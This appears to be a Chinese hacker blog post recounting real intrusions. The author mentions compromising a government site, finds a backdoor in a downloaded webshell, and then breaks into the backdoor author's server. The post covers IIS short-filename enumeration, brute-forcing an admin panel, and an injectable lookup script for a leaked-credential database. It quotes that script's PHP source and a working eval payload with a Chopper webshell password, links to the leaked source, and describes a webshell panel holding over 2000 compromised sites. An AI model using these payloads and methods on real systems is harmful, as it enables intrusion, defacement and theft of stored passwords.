滲透某Webshell箱子全過程,

前幾天拿了一個gov的站 第二天網站居然被掛上博彩鏈接了。

明明修復漏洞了 想想還是webshell出了問題

webshell是之前拿了一個dede看到裡面有前輩留下後門 功能和界面都不錯就下載下來了

打開shell發現最底部居然有一段ASCII加密的代碼 之前沒注意

解密出來 果然是一個後門程序

然後訪問這個網站 為自己的shell討回公道。

居然是某大黑闊的博客 測試發現他這個伺服器有iis短文件名漏洞。

利用~逐字猜解可以遍歷出所有目錄。

網上找了好多工具效果都不是很好 不過最後遍歷出箱子的地址

Hire Workers Online!

後台寫的比較粗糙 感覺 burp爆破就可以

不過沒有站長的相關信息 首頁有一個社工庫查詢 想試一下 數據強大不

記得這個社工庫有注入? 翻了半天百度發現自己雲盤裡就存過

鏈接 :http://pan.baidu.com/s/1qYeuaYw 用這套源碼小夥伴修復下吧

if(!empty($_REQUEST[act])){$sql="SELECT * FROM `{$v}` WHERE username={$_REQUEST[act]}";$res=mysql_query($sql);$title=<h3 stylex="color:green;">. .FROM : .$v.</h3>;$i=0; while($row=mysql_fetch_assoc($res)){ // echo <pre>; // var_dump($row); // echo </pre>;$i++; if($i > 1){$title=null; }echo $title;echo  . . .username. : .$row[username];echo  . . .password. : .$row[password];echo  . . .email. : .$row[email];echo <br/>;

沒有對任何參數過濾

前台任意代碼執行: ?act={${eval%28$_POST[x]%29}} 菜刀鏈接密碼x

一個萬年沒人訪問的站 居然放個社工庫 給自己看?

動態目錄貌似沒許可權,不過至少拿到了管理密碼

發現這個箱子還是稍微比較大 存活的shell就有2000多 而且全部被掛上了博彩鏈接。

因為沒有許可權 部分敏感地區做了打馬處理,等下次全站getshell 再截圖出來。


推薦閱讀:

論《百榮金服》提高網站安全性措施
安全狗繞過的幾種姿勢

TAG:網站滲透 | 黑客Hacker | 代碼分析 |